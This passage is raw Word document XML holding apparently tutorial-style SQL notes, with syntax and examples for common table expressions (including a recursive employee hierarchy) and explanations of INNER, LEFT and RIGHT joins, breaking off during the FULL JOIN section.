          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C50CEA7" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t>WITH cte_name AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331495EA" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t xml:space="preserve">    SELECT column1, column2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C80328" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t xml:space="preserve">    FROM some_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2DE482" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t xml:space="preserve">    WHERE condition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA413EF" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279DA752" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t>SELECT *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6628B30D" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t>FROM cte_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4269F7C1" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="00000000" w:rsidP="008503F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B22E596">
          <v:rect id="_x0000_i2986" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76526E84" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Key Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5366C220" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t>Defined using WITH keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28322F5A" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t>Acts like a temporary named result set (similar to a view but not stored).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284F4E7D" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t>Improves readability and modularity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0582CD22" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t xml:space="preserve">Can be </w:t>
      </w:r>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>recursive</w:t>
      </w:r>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (used for hierarchical data like trees).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06043BEA" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="00000000" w:rsidP="008503F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4CE7A8A">
          <v:rect id="_x0000_i2987" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7B3A13" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📘</w:t>
      </w:r>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example: Simple CTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716FE256" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t>WITH HighSalaryEmployees AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4AEBC2" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t xml:space="preserve">    SELECT name, salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11436EAF" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t xml:space="preserve">    FROM employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F9F721" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t xml:space="preserve">    WHERE salary &gt; 5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8A98BD" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221245C8" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t>SELECT * FROM HighSalaryEmployees;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320BC932" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="00000000" w:rsidP="008503F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03FF22D">
          <v:rect id="_x0000_i2988" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09325E35" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔁</w:t>
      </w:r>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example: Recursive CTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C54BEF7" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t>Used to get a hierarchy, like manager-employee chains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2EEDEA" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t>WITH RECURSIVE EmployeeHierarchy AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4569D7F0" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t xml:space="preserve">    SELECT id, name, manager_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088DF94B" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t xml:space="preserve">    FROM employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A16353" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t xml:space="preserve">    WHERE manager_id IS NULL  -- top-level boss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6C4004" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E0C3A1" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t xml:space="preserve">    UNION ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BDB9B9" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448ADDED" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t xml:space="preserve">    SELECT e.id, e.name, e.manager_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E70A058" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t xml:space="preserve">    FROM employees e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C4223D" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t xml:space="preserve">    JOIN EmployeeHierarchy eh ON e.manager_id = eh.id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6268EF" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:p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t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26606C72" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT * FROM EmployeeHierarchy;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0AC831" w14:textId="41A22129" w:rsidR="003F368A" w:rsidRPr="00DA67E8" w:rsidRDefault="00000000" w:rsidP="00591CC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8FF9FCC">
          <v:rect id="_x0000_i2989" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7106F9FD" w14:textId="27BC9EE9" w:rsidR="00296A28" w:rsidRPr="00CE4B95" w:rsidRDefault="0014590E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="712" w:name="_Toc196308192"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of join</w:t>
      </w:r>
      <w:r w:rsidR="00296A28" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="712"/>
    </w:p>
    <w:p w14:paraId="2261F6CD" w14:textId="110D2088" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26" w:rsidP="00393B05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Use of Joins in SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2345E8E5" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SQL is used to combine rows from two or more tables based on a related column between them. The purpose of using joins is to retrieve and present data that is spread across multiple tables in a relational database. By using joins, you can efficiently retrieve related data from different tables without having to perform multiple queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C046B8A" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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Why Joins are Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609E5882" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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lastRenderedPageBreak/>
        <w:t>Retrieve Related Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In relational databases, data is usually stored in different tables, each focusing on a specific aspect of the system. Joins allow you to combine data from multiple tables based on their relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B66917" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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Reduce Data Redundancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of repeating information in each table, joins allow you to store data in separate, normalized tables and then fetch it together when needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EA667B" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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ata Aggregation</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Joins help in aggregating data from multiple sources, such as calculating the total salary of employees grouped by department, or finding orders placed by customers in a specific region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086A4F55" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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Improve Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When used properly, joins can allow for efficient data retrieval. Instead of querying each table individually and processing the results, you can combine data from multiple tables in a single query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717230C4" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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Types of Joins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C5B495" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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INNER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAD88D3"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escription</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns rows when there is a match in both tables. If there is no match, the row is excluded from the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F66F88A"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you only want to return rows that have matching records in both tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C59C9EE"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA49CC7"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ELECT e.employee_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751F7F04"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FROM employees e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5458BF0D"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INNER JOIN departments d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA646A3"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ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F0D126" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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This will return employees who are associated with a department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05949B6A" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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LEFT JOIN (LEFT OUTER JOIN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311AE79B"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escription</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns all rows from the left table (first table), and the matched rows from the right table (second table). If no match is found, the result will contain NULL for columns from the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703404B1"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you want all records from the left table, even if there is no corresponding match in the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A4DCE9"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBB8B9E"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ELECT e.employee_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE81659"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FROM employees e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AE2808"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LEFT JOIN departments d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C426A42"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ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF35E63" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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This will return all employees, even those who are not assigned to any department. If there's no match for a department, the department_name will be NULL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7578D1E8" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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RIGHT JOIN (RIGHT OUTER JOIN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719983C"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escription</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Similar to a LEFT JOIN, but it returns all rows from the right table and the matching rows from the left table. If no match is found, the result will contain NULL for columns from the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1FF73"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you want all records from the right table, even if there is no corresponding match in the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE1CDD2"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA1D2A0"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ELECT e.employee_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D19F5BA"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FROM employees e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F4C3D9"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RIGHT JOIN departments d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040A4F86"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ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A998C8B" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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This will return all departments, even those that do not have any employees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB16134" w14:textId="77777777" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26"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FULL JOIN (FULL OUTER JOIN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EABDEB"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escription</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
